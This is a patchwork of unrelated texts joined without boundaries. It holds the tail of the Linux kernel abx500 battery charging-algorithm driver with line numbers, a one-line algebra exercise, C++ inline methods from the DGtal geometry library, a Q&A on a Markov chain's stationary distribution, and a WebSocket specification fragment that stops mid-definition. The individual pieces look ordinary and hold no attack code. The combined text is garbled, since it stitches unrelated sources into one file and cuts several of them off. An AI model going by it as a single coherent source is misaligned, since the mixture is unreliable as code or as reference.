1573 di->maintenance_chg = false;
1574 power_supply_changed(di->chargalg_psy);
1575
1576 break;
1577
1578 case STATE_USB_PP_PRE_CHARGE:
1579 if (di->batt_data.volt >
1580 (di->bm->fg_params->lowbat_threshold +
1581 BAT_PLUS_MARGIN))
1582 abx500_chargalg_state_to(di, STATE_NORMAL_INIT);
1583 break;
1584
1585 case STATE_NORMAL:
1586 handle_maxim_chg_curr(di);
1587 if (di->charge_status == POWER_SUPPLY_STATUS_FULL &&
1588 di->maintenance_chg) {
1589 if (di->bm->no_maintenance)
1590 abx500_chargalg_state_to(di,
1591 STATE_WAIT_FOR_RECHARGE_INIT);
1592 else
1593 abx500_chargalg_state_to(di,
1594 STATE_MAINTENANCE_A_INIT);
1595 }
1596 break;
1597
1598 /* This state will be used when the maintenance state is disabled */
1599 case STATE_WAIT_FOR_RECHARGE_INIT:
1600 abx500_chargalg_hold_charging(di);
1601 abx500_chargalg_state_to(di, STATE_WAIT_FOR_RECHARGE);
1602 /* Intentional fallthrough */
1603
1604 case STATE_WAIT_FOR_RECHARGE:
1605 if (di->batt_data.percent <=
1606 di->bm->bat_type[di->bm->batt_id].
1607 recharge_cap)
1608 abx500_chargalg_state_to(di, STATE_NORMAL_INIT);
1609 break;
1610
1611 case STATE_MAINTENANCE_A_INIT:
1612 abx500_chargalg_stop_safety_timer(di);
1613 abx500_chargalg_start_maintenance_timer(di,
1614 di->bm->bat_type[
1615 di->bm->batt_id].maint_a_chg_timer_h);
1616 abx500_chargalg_start_charging(di,
1617 di->bm->bat_type[
1618 di->bm->batt_id].maint_a_vol_lvl,
1619 di->bm->bat_type[
1620 di->bm->batt_id].maint_a_cur_lvl);
1621 abx500_chargalg_state_to(di, STATE_MAINTENANCE_A);
1622 power_supply_changed(di->chargalg_psy);
1623 /* Intentional fallthrough*/
1624
1625 case STATE_MAINTENANCE_A:
1626 if (di->events.maintenance_timer_expired) {
1627 abx500_chargalg_stop_maintenance_timer(di);
1628 abx500_chargalg_state_to(di, STATE_MAINTENANCE_B_INIT);
1629 }
1630 break;
1631
1632 case STATE_MAINTENANCE_B_INIT:
1633 abx500_chargalg_start_maintenance_timer(di,
1634 di->bm->bat_type[
1635 di->bm->batt_id].maint_b_chg_timer_h);
1636 abx500_chargalg_start_charging(di,
1637 di->bm->bat_type[
1638 di->bm->batt_id].maint_b_vol_lvl,
1639 di->bm->bat_type[
1640 di->bm->batt_id].maint_b_cur_lvl);
1641 abx500_chargalg_state_to(di, STATE_MAINTENANCE_B);
1642 power_supply_changed(di->chargalg_psy);
1643 /* Intentional fallthrough*/
1644
1645 case STATE_MAINTENANCE_B:
1646 if (di->events.maintenance_timer_expired) {
1647 abx500_chargalg_stop_maintenance_timer(di);
1648 abx500_chargalg_state_to(di, STATE_NORMAL_INIT);
1649 }
1650 break;
1651
1652 case STATE_TEMP_LOWHIGH_INIT:
1653 abx500_chargalg_start_charging(di,
1654 di->bm->bat_type[
1655 di->bm->batt_id].low_high_vol_lvl,
1656 di->bm->bat_type[
1657 di->bm->batt_id].low_high_cur_lvl);
1658 abx500_chargalg_stop_maintenance_timer(di);
1659 di->charge_status = POWER_SUPPLY_STATUS_CHARGING;
1660 abx500_chargalg_state_to(di, STATE_TEMP_LOWHIGH);
1661 power_supply_changed(di->chargalg_psy);
1662 /* Intentional fallthrough */
1663
1664 case STATE_TEMP_LOWHIGH:
1665 if (!di->events.btemp_lowhigh)
1666 abx500_chargalg_state_to(di, STATE_NORMAL_INIT);
1667 break;
1668
1669 case STATE_WD_EXPIRED_INIT:
1670 abx500_chargalg_stop_charging(di);
1671 abx500_chargalg_state_to(di, STATE_WD_EXPIRED);
1672 /* Intentional fallthrough */
1673
1674 case STATE_WD_EXPIRED:
1675 if (!di->events.ac_wd_expired &&
1676 !di->events.usb_wd_expired)
1677 abx500_chargalg_state_to(di, STATE_NORMAL_INIT);
1678 break;
1679
1680 case STATE_TEMP_UNDEROVER_INIT:
1681 abx500_chargalg_stop_charging(di);
1682 abx500_chargalg_state_to(di, STATE_TEMP_UNDEROVER);
1683 /* Intentional fallthrough */
1684
1685 case STATE_TEMP_UNDEROVER:
1686 if (!di->events.btemp_underover)
1687 abx500_chargalg_state_to(di, STATE_NORMAL_INIT);
1688 break;
1689 }
1690
1691 /* Start charging directly if the new state is a charge state */
1692 if (di->charge_state == STATE_NORMAL_INIT ||
1693 di->charge_state == STATE_MAINTENANCE_A_INIT ||
1694 di->charge_state == STATE_MAINTENANCE_B_INIT)
1695 queue_work(di->chargalg_wq, &di->chargalg_work);
1696 }
1697
1698 /**
1699 * abx500_chargalg_periodic_work() - Periodic work for the algorithm
1700 * @work: pointer to the work_struct structure
1701 *
1702 * Work queue function for the charging algorithm
1703 */
1704 static void abx500_chargalg_periodic_work(struct work_struct *work)
1705 {
1706 struct abx500_chargalg *di = container_of(work,
1707 struct abx500_chargalg, chargalg_periodic_work.work);
1708
1709 abx500_chargalg_algorithm(di);
1710
1711 /*
1712 * If a charger is connected then the battery has to be monitored
1713 * frequently, else the work can be delayed.
1714 */
1715 if (di->chg_info.conn_chg)
1716 queue_delayed_work(di->chargalg_wq,
1717 &di->chargalg_periodic_work,
1718 di->bm->interval_charging * HZ);
1719 else
1720 queue_delayed_work(di->chargalg_wq,
1721 &di->chargalg_periodic_work,
1722 di->bm->interval_not_charging * HZ);
1723 }
1724
1725 /**
1726 * abx500_chargalg_wd_work() - periodic work to kick the charger watchdog
1727 * @work: pointer to the work_struct structure
1728 *
1729 * Work queue function for kicking the charger watchdog
1730 */
1731 static void abx500_chargalg_wd_work(struct work_struct *work)
1732 {
1733 int ret;
1734 struct abx500_chargalg *di = container_of(work,
1735 struct abx500_chargalg, chargalg_wd_work.work);
1736
1737 dev_dbg(di->dev, "abx500_chargalg_wd_work\n");
1738
1739 ret = abx500_chargalg_kick_watchdog(di);
1740 if (ret < 0)
1741 dev_err(di->dev, "failed to kick watchdog\n");
1742
1743 queue_delayed_work(di->chargalg_wq,
1744 &di->chargalg_wd_work, CHG_WD_INTERVAL);
1745 }
1746
1747 /**
1748 * abx500_chargalg_work() - Work to run the charging algorithm instantly
1749 * @work: pointer to the work_struct structure
1750 *
1751 * Work queue function for calling the charging algorithm
1752 */
1753 static void abx500_chargalg_work(struct work_struct *work)
1754 {
1755 struct abx500_chargalg *di = container_of(work,
1756 struct abx500_chargalg, chargalg_work);
1757
1758 abx500_chargalg_algorithm(di);
1759 }
1760
1761 /**
1762 * abx500_chargalg_get_property() - get the chargalg properties
1763 * @psy: pointer to the power_supply structure
1764 * @psp: pointer to the power_supply_property structure
1765 * @val: pointer to the power_supply_propval union
1766 *
1767 * This function gets called when an application tries to get the
1768 * chargalg properties by reading the sysfs files.
1769 * status: charging/discharging/full/unknown
1770 * health: health of the battery
1771 * Returns error code in case of failure else 0 on success
1772 */
1773 static int abx500_chargalg_get_property(struct power_supply *psy,
1774 enum power_supply_property psp,
1775 union power_supply_propval *val)
1776 {
1777 struct abx500_chargalg *di = power_supply_get_drvdata(psy);
1778
1779 switch (psp) {
1780 case POWER_SUPPLY_PROP_STATUS:
1781 val->intval = di->charge_status;
1782 break;
1783 case POWER_SUPPLY_PROP_HEALTH:
1784 if (di->events.batt_ovv) {
1785 val->intval = POWER_SUPPLY_HEALTH_OVERVOLTAGE;
1786 } else if (di->events.btemp_underover) {
1787 if (di->batt_data.temp <= di->bm->temp_under)
1788 val->intval = POWER_SUPPLY_HEALTH_COLD;
1789 else
1790 val->intval = POWER_SUPPLY_HEALTH_OVERHEAT;
1791 } else if (di->charge_state == STATE_SAFETY_TIMER_EXPIRED ||
1792 di->charge_state == STATE_SAFETY_TIMER_EXPIRED_INIT) {
1793 val->intval = POWER_SUPPLY_HEALTH_UNSPEC_FAILURE;
1794 } else {
1795 val->intval = POWER_SUPPLY_HEALTH_GOOD;
1796 }
1797 break;
1798 default:
1799 return -EINVAL;
1800 }
1801 return 0;
1802 }
1803
1804 /* Exposure to the sysfs interface */
1805
1806 static ssize_t abx500_chargalg_curr_step_show(struct abx500_chargalg *di,
1807 char *buf)
1808 {
1809 return sprintf(buf, "%d\n", di->curr_status.curr_step);
1810 }
1811
1812 static ssize_t abx500_chargalg_curr_step_store(struct abx500_chargalg *di,
1813 const char *buf, size_t length)
1814 {
1815 long int param;
1816 int ret;
1817
1818 	ret = kstrtol(buf, 10, &param);
1819 if (ret < 0)
1820 return ret;
1821
1822 di->curr_status.curr_step = param;
1823 if (di->curr_status.curr_step >= CHARGALG_CURR_STEP_LOW &&
1824 di->curr_status.curr_step <= CHARGALG_CURR_STEP_HIGH) {
1825 di->curr_status.curr_step_change = true;
1826 queue_work(di->chargalg_wq, &di->chargalg_work);
1827 } else
1828 dev_info(di->dev, "Wrong current step\n"
1829 "Enter 0. Disable AC/USB Charging\n"
1830 "1--100. Set AC/USB charging current step\n"
1831 "100. Enable AC/USB Charging\n");
1832
1833 return strlen(buf);
1834 }
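/*
 * Editor's note: a minimal usage sketch, assuming the kobject created
 * in abx500_chargalg_sysfs_init() below lands at /sys/abx500_chargalg:
 *
 *   echo 0   > /sys/abx500_chargalg/chargalg_curr_step   # stop charging
 *   echo 50  > /sys/abx500_chargalg/chargalg_curr_step   # 50% of normal_cur_lvl
 *   echo 100 > /sys/abx500_chargalg/chargalg_curr_step   # full current step
 */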
1835
1836
1837 static ssize_t abx500_chargalg_en_show(struct abx500_chargalg *di,
1838 char *buf)
1839 {
1840 return sprintf(buf, "%d\n",
1841 di->susp_status.ac_suspended &&
1842 di->susp_status.usb_suspended);
1843 }
1844
1845 static ssize_t abx500_chargalg_en_store(struct abx500_chargalg *di,
1846 const char *buf, size_t length)
1847 {
1848 long int param;
1849 int ac_usb;
1850 int ret;
1851
1852 	ret = kstrtol(buf, 10, &param);
1853 if (ret < 0)
1854 return ret;
1855
1856 ac_usb = param;
1857 switch (ac_usb) {
1858 case 0:
1859 /* Disable charging */
1860 di->susp_status.ac_suspended = true;
1861 di->susp_status.usb_suspended = true;
1862 di->susp_status.suspended_change = true;
1863 /* Trigger a state change */
1864 queue_work(di->chargalg_wq,
1865 &di->chargalg_work);
1866 break;
1867 case 1:
1868 /* Enable AC Charging */
1869 di->susp_status.ac_suspended = false;
1870 di->susp_status.suspended_change = true;
1871 /* Trigger a state change */
1872 queue_work(di->chargalg_wq,
1873 &di->chargalg_work);
1874 break;
1875 case 2:
1876 /* Enable USB charging */
1877 di->susp_status.usb_suspended = false;
1878 di->susp_status.suspended_change = true;
1879 /* Trigger a state change */
1880 queue_work(di->chargalg_wq,
1881 &di->chargalg_work);
1882 break;
1883 default:
1884 dev_info(di->dev, "Wrong input\n"
1885 "Enter 0. Disable AC/USB Charging\n"
1886 "1. Enable AC charging\n"
1887 "2. Enable USB Charging\n");
1888 	}
1889 return strlen(buf);
1890 }
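/*
 * Editor's note: companion usage sketch for the "chargalg" attribute,
 * with the same assumed mount point:
 *
 *   echo 0 > /sys/abx500_chargalg/chargalg   # suspend AC and USB charging
 *   echo 1 > /sys/abx500_chargalg/chargalg   # re-enable AC charging
 *   echo 2 > /sys/abx500_chargalg/chargalg   # re-enable USB charging
 */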
1891
1892 static struct abx500_chargalg_sysfs_entry abx500_chargalg_en_charger =
1893 __ATTR(chargalg, 0644, abx500_chargalg_en_show,
1894 abx500_chargalg_en_store);
1895
1896 static struct abx500_chargalg_sysfs_entry abx500_chargalg_curr_step =
1897 __ATTR(chargalg_curr_step, 0644, abx500_chargalg_curr_step_show,
1898 abx500_chargalg_curr_step_store);
1899
1900 static ssize_t abx500_chargalg_sysfs_show(struct kobject *kobj,
1901 struct attribute *attr, char *buf)
1902 {
1903 struct abx500_chargalg_sysfs_entry *entry = container_of(attr,
1904 struct abx500_chargalg_sysfs_entry, attr);
1905
1906 struct abx500_chargalg *di = container_of(kobj,
1907 struct abx500_chargalg, chargalg_kobject);
1908
1909 if (!entry->show)
1910 return -EIO;
1911
1912 return entry->show(di, buf);
1913 }
1914
1915 static ssize_t abx500_chargalg_sysfs_charger(struct kobject *kobj,
1916 struct attribute *attr, const char *buf, size_t length)
1917 {
1918 struct abx500_chargalg_sysfs_entry *entry = container_of(attr,
1919 struct abx500_chargalg_sysfs_entry, attr);
1920
1921 struct abx500_chargalg *di = container_of(kobj,
1922 struct abx500_chargalg, chargalg_kobject);
1923
1924 if (!entry->store)
1925 return -EIO;
1926
1927 return entry->store(di, buf, length);
1928 }
1929
1930 static struct attribute *abx500_chargalg_chg[] = {
1931 &abx500_chargalg_en_charger.attr,
1932 &abx500_chargalg_curr_step.attr,
1933 NULL,
1934 };
1935
1936 static const struct sysfs_ops abx500_chargalg_sysfs_ops = {
1937 .show = abx500_chargalg_sysfs_show,
1938 .store = abx500_chargalg_sysfs_charger,
1939 };
1940
1941 static struct kobj_type abx500_chargalg_ktype = {
1942 .sysfs_ops = &abx500_chargalg_sysfs_ops,
1943 .default_attrs = abx500_chargalg_chg,
1944 };
1945
1946 /**
1947 * abx500_chargalg_sysfs_exit() - de-init of sysfs entry
1948 * @di: pointer to the struct abx500_chargalg
1949 *
1950 * This function removes the entry in sysfs.
1951 */
1952 static void abx500_chargalg_sysfs_exit(struct abx500_chargalg *di)
1953 {
1954 kobject_del(&di->chargalg_kobject);
1955 }
1956
1957 /**
1958 * abx500_chargalg_sysfs_init() - init of sysfs entry
1959 * @di: pointer to the struct abx500_chargalg
1960 *
1961 * This function adds an entry in sysfs.
1962 * Returns error code in case of failure else 0(on success)
1963 */
1964 static int abx500_chargalg_sysfs_init(struct abx500_chargalg *di)
1965 {
1966 int ret = 0;
1967
1968 ret = kobject_init_and_add(&di->chargalg_kobject,
1969 &abx500_chargalg_ktype,
1970 NULL, "abx500_chargalg");
1971 if (ret < 0)
1972 dev_err(di->dev, "failed to create sysfs entry\n");
1973
1974 return ret;
1975 }
1976 /* Exposure to the sysfs interface <<END>> */
1977
1978 #if defined(CONFIG_PM)
1979 static int abx500_chargalg_resume(struct platform_device *pdev)
1980 {
1981 struct abx500_chargalg *di = platform_get_drvdata(pdev);
1982
1983 /* Kick charger watchdog if charging (any charger online) */
1984 if (di->chg_info.online_chg)
1985 queue_delayed_work(di->chargalg_wq, &di->chargalg_wd_work, 0);
1986
1987 /*
1988 * Run the charging algorithm directly to be sure we don't
1989 * do it too seldom
1990 */
1991 queue_delayed_work(di->chargalg_wq, &di->chargalg_periodic_work, 0);
1992
1993 return 0;
1994 }
1995
1996 static int abx500_chargalg_suspend(struct platform_device *pdev,
1997 pm_message_t state)
1998 {
1999 struct abx500_chargalg *di = platform_get_drvdata(pdev);
2000
2001 if (di->chg_info.online_chg)
2002 cancel_delayed_work_sync(&di->chargalg_wd_work);
2003
2004 cancel_delayed_work_sync(&di->chargalg_periodic_work);
2005
2006 return 0;
2007 }
2008 #else
2009 #define abx500_chargalg_suspend NULL
2010 #define abx500_chargalg_resume NULL
2011 #endif
2012
2013 static int abx500_chargalg_remove(struct platform_device *pdev)
2014 {
2015 struct abx500_chargalg *di = platform_get_drvdata(pdev);
2016
2017 /* sysfs interface to enable/disbale charging from user space */
2018 abx500_chargalg_sysfs_exit(di);
2019
2020 hrtimer_cancel(&di->safety_timer);
2021 hrtimer_cancel(&di->maintenance_timer);
2022
2023 cancel_delayed_work_sync(&di->chargalg_periodic_work);
2024 cancel_delayed_work_sync(&di->chargalg_wd_work);
2025 cancel_work_sync(&di->chargalg_work);
2026
2027 /* Delete the work queue */
2028 destroy_workqueue(di->chargalg_wq);
2029
2030 power_supply_unregister(di->chargalg_psy);
2031
2032 return 0;
2033 }
2034
2035 static char *supply_interface[] = {
2036 "ab8500_fg",
2037 };
2038
2039 static const struct power_supply_desc abx500_chargalg_desc = {
2040 .name = "abx500_chargalg",
2041 .type = POWER_SUPPLY_TYPE_BATTERY,
2042 .properties = abx500_chargalg_props,
2043 .num_properties = ARRAY_SIZE(abx500_chargalg_props),
2044 .get_property = abx500_chargalg_get_property,
2045 .external_power_changed = abx500_chargalg_external_power_changed,
2046 };
2047
2048 static int abx500_chargalg_probe(struct platform_device *pdev)
2049 {
2050 struct device_node *np = pdev->dev.of_node;
2051 struct abx500_bm_data *plat = pdev->dev.platform_data;
2052 struct power_supply_config psy_cfg = {};
2053 struct abx500_chargalg *di;
2054 int ret = 0;
2055
2056 di = devm_kzalloc(&pdev->dev, sizeof(*di), GFP_KERNEL);
2057 if (!di) {
2058 dev_err(&pdev->dev, "%s no mem for ab8500_chargalg\n", __func__);
2059 return -ENOMEM;
2060 }
2061
2062 if (!plat) {
2063 dev_err(&pdev->dev, "no battery management data supplied\n");
2064 return -EINVAL;
2065 }
2066 di->bm = plat;
2067
2068 if (np) {
2069 ret = ab8500_bm_of_probe(&pdev->dev, np, di->bm);
2070 if (ret) {
2071 dev_err(&pdev->dev, "failed to get battery information\n");
2072 return ret;
2073 }
2074 }
2075
2076 /* get device struct and parent */
2077 di->dev = &pdev->dev;
2078 di->parent = dev_get_drvdata(pdev->dev.parent);
2079
2080 psy_cfg.supplied_to = supply_interface;
2081 psy_cfg.num_supplicants = ARRAY_SIZE(supply_interface);
2082 psy_cfg.drv_data = di;
2083
2084 /* Initilialize safety timer */
2085 hrtimer_init(&di->safety_timer, CLOCK_REALTIME, HRTIMER_MODE_ABS);
2086 di->safety_timer.function = abx500_chargalg_safety_timer_expired;
2087
2088 /* Initilialize maintenance timer */
2089 hrtimer_init(&di->maintenance_timer, CLOCK_REALTIME, HRTIMER_MODE_ABS);
2090 di->maintenance_timer.function =
2091 abx500_chargalg_maintenance_timer_expired;
2092
2093 /* Create a work queue for the chargalg */
2094 di->chargalg_wq =
2095 create_singlethread_workqueue("abx500_chargalg_wq");
2096 if (di->chargalg_wq == NULL) {
2097 dev_err(di->dev, "failed to create work queue\n");
2098 return -ENOMEM;
2099 }
2100
2101 /* Init work for chargalg */
2102 INIT_DEFERRABLE_WORK(&di->chargalg_periodic_work,
2103 abx500_chargalg_periodic_work);
2104 INIT_DEFERRABLE_WORK(&di->chargalg_wd_work,
2105 abx500_chargalg_wd_work);
2106
2107 /* Init work for chargalg */
2108 INIT_WORK(&di->chargalg_work, abx500_chargalg_work);
2109
2110 /* To detect charger at startup */
2111 di->chg_info.prev_conn_chg = -1;
2112
2113 /* Register chargalg power supply class */
2114 di->chargalg_psy = power_supply_register(di->dev, &abx500_chargalg_desc,
2115 &psy_cfg);
2116 if (IS_ERR(di->chargalg_psy)) {
2117 dev_err(di->dev, "failed to register chargalg psy\n");
2118 ret = PTR_ERR(di->chargalg_psy);
2119 goto free_chargalg_wq;
2120 }
2121
2122 platform_set_drvdata(pdev, di);
2123
2124 /* sysfs interface to enable/disable charging from user space */
2125 ret = abx500_chargalg_sysfs_init(di);
2126 if (ret) {
2127 dev_err(di->dev, "failed to create sysfs entry\n");
2128 goto free_psy;
2129 }
2130 di->curr_status.curr_step = CHARGALG_CURR_STEP_HIGH;
2131
2132 /* Run the charging algorithm */
2133 queue_delayed_work(di->chargalg_wq, &di->chargalg_periodic_work, 0);
2134
2135 dev_info(di->dev, "probe success\n");
2136 return ret;
2137
2138 free_psy:
2139 power_supply_unregister(di->chargalg_psy);
2140 free_chargalg_wq:
2141 destroy_workqueue(di->chargalg_wq);
2142 return ret;
2143 }
2144
2145 static const struct of_device_id ab8500_chargalg_match[] = {
2146 { .compatible = "stericsson,ab8500-chargalg", },
2147 { },
2148 };
2149
2150 static struct platform_driver abx500_chargalg_driver = {
2151 .probe = abx500_chargalg_probe,
2152 .remove = abx500_chargalg_remove,
2153 .suspend = abx500_chargalg_suspend,
2154 .resume = abx500_chargalg_resume,
2155 .driver = {
2156 .name = "ab8500-chargalg",
2157 .of_match_table = ab8500_chargalg_match,
2158 },
2159 };
2160
2161 module_platform_driver(abx500_chargalg_driver);
2162
2163 MODULE_LICENSE("GPL v2");
2164 MODULE_AUTHOR("Johan Palsson, Karl Komierowski");
2165 MODULE_ALIAS("platform:abx500-chargalg");
2166 MODULE_DESCRIPTION("abx500 battery charging algorithm");
2167
Evaluate each expression, Algebra
-16 = n + 1
Posted Date: 9/30/2012 12:31:07 PM | Location : United States
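A worked solution: subtracting 1 from both sides gives n = -16 - 1, i.e. n = -17.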
DGtal 0.9.3
TrueDigitalSurfaceLocalEstimator.ih
/**
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU Lesser General Public License as
 * published by the Free Software Foundation, either version 3 of the
 * License, or (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program. If not, see <http://www.gnu.org/licenses/>.
 *
 **/

/**
 * @file TrueDigitalSurfaceLocalEstimator.ih
 * @author Jacques-Olivier Lachaud (\c [email protected] )
 * Laboratory of Mathematics (CNRS, UMR 5127), University of Savoie, France
 *
 * @date 2014/02/14
 *
 * Implementation of inline methods defined in TrueDigitalSurfaceLocalEstimator.h
 *
 * This file is part of the DGtal library.
 */


//////////////////////////////////////////////////////////////////////////////
#include <cstdlib>
//////////////////////////////////////////////////////////////////////////////

///////////////////////////////////////////////////////////////////////////////
// IMPLEMENTATION of inline methods.
///////////////////////////////////////////////////////////////////////////////

///////////////////////////////////////////////////////////////////////////////
// ----------------------- Standard services ------------------------------

//-----------------------------------------------------------------------------
template <typename TKSpace, typename TShape, typename TGeometricFunctor>
inline
DGtal::TrueDigitalSurfaceLocalEstimator<TKSpace, TShape, TGeometricFunctor>::
~TrueDigitalSurfaceLocalEstimator()
{
}
//-----------------------------------------------------------------------------
template <typename TKSpace, typename TShape, typename TGeometricFunctor>
inline
DGtal::TrueDigitalSurfaceLocalEstimator<TKSpace, TShape, TGeometricFunctor>::
TrueDigitalSurfaceLocalEstimator()
  : myKSpace( 0 ), myFct( 0 ), myEmbedder(),
    myShape( 0 ), myH( 1.0 ),
    myMaxIter( 0 ), myAccuracy( 0.1 ), myGamma( 0.01 )
{
}
//-----------------------------------------------------------------------------
template <typename TKSpace, typename TShape, typename TGeometricFunctor>
inline
DGtal::TrueDigitalSurfaceLocalEstimator<TKSpace, TShape, TGeometricFunctor>::
TrueDigitalSurfaceLocalEstimator( const Self& other )
  : myKSpace( other.myKSpace ), myFct( other.myFct ), myEmbedder( other.myEmbedder ),
    myShape( other.myShape ), myH( other.myH ),
    myMaxIter( other.myMaxIter ), myAccuracy( other.myAccuracy ), myGamma( other.myGamma )
{
}
//-----------------------------------------------------------------------------
template <typename TKSpace, typename TShape, typename TGeometricFunctor>
inline
DGtal::TrueDigitalSurfaceLocalEstimator<TKSpace, TShape, TGeometricFunctor>&
DGtal::TrueDigitalSurfaceLocalEstimator<TKSpace, TShape, TGeometricFunctor>::
operator=( const Self& other )
{
  if ( this != &other )
    {
      myKSpace = other.myKSpace;
      myFct = other.myFct;
      myEmbedder = other.myEmbedder;
      myShape = other.myShape;
      myH = other.myH;
      myMaxIter = other.myMaxIter;
      myAccuracy = other.myAccuracy;
      myGamma = other.myGamma;
    }
  return *this;
}

//-----------------------------------------------------------------------------
template <typename TKSpace, typename TShape, typename TGeometricFunctor>
inline
typename DGtal::TrueDigitalSurfaceLocalEstimator<TKSpace, TShape, TGeometricFunctor>::Scalar
DGtal::TrueDigitalSurfaceLocalEstimator<TKSpace, TShape, TGeometricFunctor>::
h() const
{
  return myH;
}
//-----------------------------------------------------------------------------
template <typename TKSpace, typename TShape, typename TGeometricFunctor>
inline
void
DGtal::TrueDigitalSurfaceLocalEstimator<TKSpace, TShape, TGeometricFunctor>::
attach( ConstAlias<Shape> aShape )
{
  myShape = aShape;
  if ( ( myShape != 0 ) && ( myFct != 0 ) ) myFct->attach( myShape );
}
//-----------------------------------------------------------------------------
template <typename TKSpace, typename TShape, typename TGeometricFunctor>
inline
void
DGtal::TrueDigitalSurfaceLocalEstimator<TKSpace, TShape, TGeometricFunctor>::
setParams( ConstAlias<KSpace> ks,
           Clone<GeometricFunctor> fct,
           const int maxIter,
           const Scalar accuracy,
           const Scalar gamma )
{
  myKSpace = ks;
  myFct = fct;
  if ( ( myShape != 0 ) && ( myFct != 0 ) ) myFct->attach( myShape );
  myEmbedder = SCellEmbedder( *myKSpace );
  myMaxIter = maxIter;
  myAccuracy = accuracy;
  myGamma = gamma;
}
//-----------------------------------------------------------------------------
template <typename TKSpace, typename TShape, typename TGeometricFunctor>
template <typename SurfelConstIterator>
inline
void
DGtal::TrueDigitalSurfaceLocalEstimator<TKSpace, TShape, TGeometricFunctor>::
init( const Scalar _h,
      SurfelConstIterator /* itb */,
      SurfelConstIterator /* ite */ )
{
  myH = _h;
}

//-----------------------------------------------------------------------------
template <typename TKSpace, typename TShape, typename TGeometricFunctor>
template <typename SurfelConstIterator>
inline
typename DGtal::TrueDigitalSurfaceLocalEstimator<TKSpace, TShape, TGeometricFunctor>::Quantity
DGtal::TrueDigitalSurfaceLocalEstimator<TKSpace, TShape, TGeometricFunctor>::
eval( SurfelConstIterator it ) const
{
  ASSERT( isValid() );
  BOOST_CONCEPT_ASSERT(( boost::InputIterator<SurfelConstIterator> ));
  return myFct->operator()( embed( *it ) );
}
//-----------------------------------------------------------------------------
template <typename TKSpace, typename TShape, typename TGeometricFunctor>
template <typename OutputIterator, typename SurfelConstIterator>
inline
OutputIterator
DGtal::TrueDigitalSurfaceLocalEstimator<TKSpace, TShape, TGeometricFunctor>::
eval( SurfelConstIterator itb,
      SurfelConstIterator ite,
      OutputIterator result ) const
{
  BOOST_CONCEPT_ASSERT(( boost::InputIterator<SurfelConstIterator> ));
  BOOST_CONCEPT_ASSERT(( boost::OutputIterator<OutputIterator,Quantity> ));
  for ( ; itb != ite; ++itb )
    *result++ = this->eval( itb );
  return result;
}
//-----------------------------------------------------------------------------
template <typename TKSpace, typename TShape, typename TGeometricFunctor>
inline
typename DGtal::TrueDigitalSurfaceLocalEstimator<TKSpace, TShape, TGeometricFunctor>::RealPoint
DGtal::TrueDigitalSurfaceLocalEstimator<TKSpace, TShape, TGeometricFunctor>::
embed( Surfel surfel ) const
{
  ASSERT( isValid() );
  RealPoint p = myEmbedder( surfel );
  p *= myH;
  return ( myMaxIter > 0 )
    ? myShape->nearestPoint( p, myAccuracy, myMaxIter, myGamma )
    : p;
}

///////////////////////////////////////////////////////////////////////////////
// Interface - public :

/**
 * Writes/Displays the object on an output stream.
 * @param out the output stream where the object is written.
 */
template <typename TKSpace, typename TShape, typename TGeometricFunctor>
inline
void
DGtal::TrueDigitalSurfaceLocalEstimator<TKSpace, TShape, TGeometricFunctor>::
selfDisplay ( std::ostream & out ) const
{
  out << "[TrueDigitalSurfaceLocalEstimator]";
}

/**
 * Checks the validity/consistency of the object.
 * @return 'true' if the object is valid, 'false' otherwise.
 */
template <typename TKSpace, typename TShape, typename TGeometricFunctor>
inline
bool
DGtal::TrueDigitalSurfaceLocalEstimator<TKSpace, TShape, TGeometricFunctor>::
isValid() const
{
  return ( myKSpace != 0 )
    && ( myFct != 0 )
    && ( myShape != 0 )
    && ( myEmbedder.isValid() );
}


///////////////////////////////////////////////////////////////////////////////
// Implementation of inline functions                                        //

template <typename TKSpace, typename TShape, typename TGeometricFunctor>
inline
std::ostream&
DGtal::operator<< ( std::ostream & out,
                    const TrueDigitalSurfaceLocalEstimator<TKSpace, TShape, TGeometricFunctor> & object )
{
  object.selfDisplay( out );
  return out;
}

//                                                                           //
///////////////////////////////////////////////////////////////////////////////
I have a markov chain with transition matrix below,
$$\begin{bmatrix} 1-q & q & & & \\ 1-q & 0 & q & & \\ & 1-q & 0 & q & \\ & & 1-q & 0 & q \\ & & & \ddots & \ddots & \ddots \end{bmatrix}$$ and I am asked to compute the stationary distribution for $q<\frac{1}{2}$. Using $\pi P =\pi$, I get that $\pi_n =\pi_0\left(\frac{q}{1-q}\right)^n$ and $\sum_{n=0}^\infty \pi_n = 1$.
Thus I get
$\pi_0\sum_{n=0}^\infty \left(\frac{q}{1-q}\right)^n=1 \\ \pi_0=\frac{1}{\sum_{n=0}^\infty \left(\frac{q}{1-q}\right)^n} \\ \text{thus } \pi_n = \frac{\left(\frac{q}{1-q}\right)^n}{\sum_{n=0}^\infty \left(\frac{q}{1-q}\right)^n}$
But it doesn't seem to be fully simplified. Is there anything else I can do to simplify $\pi_0=\frac{1}{\sum_{n=0}^\infty \left(\frac{q}{1-q}\right)^n}$, and thus simplify $\pi_n$?
Since $q < \frac{1}{2}$, $\gamma = \frac{q}{1-q} < 1$, so the sum in the denominator is a geometric series. – Neal May 7 '12 at 19:49
Thanks @Neal, so I get that $\sum_{n=0}^\infty \left(\frac{q}{1-q}\right)^n =\frac{q}{1-2q}$, hence $\pi_0 = \frac{1-2q}{2q}$? – Richard May 7 '12 at 20:07
I get $\sum\gamma^n = \frac{1}{1-\gamma} = \frac{1}{1-\frac{q}{1-q}} = \frac{1-q}{1-2q}$ so $\pi_0 = \frac{1-2q}{1-q}$. – Neal May 10 '12 at 15:15
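Putting the comments together: for $q<\frac{1}{2}$ the ratio $\gamma = \frac{q}{1-q}$ is less than $1$, the geometric series converges, and the stationary distribution has the closed form

$$\pi_0 = 1-\frac{q}{1-q} = \frac{1-2q}{1-q}, \qquad \pi_n = \frac{1-2q}{1-q}\left(\frac{q}{1-q}\right)^n, \quad n \ge 0.$$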
9.3 Web sockets
9.3.1 Introduction
This section is non-normative.
To enable Web applications to maintain bidirectional communications with server-side processes, this specification introduces the WebSocket interface.
This interface does not allow for raw access to the underlying network. For example, this interface could not be used to implement an IRC client without proxying messages through a custom server.
9.3.2 The WebSocket interface
enum BinaryType { "blob", "arraybuffer" };

[Constructor(USVString url, optional (DOMString or sequence<DOMString>) protocols = []), Exposed=(Window,Worker)]
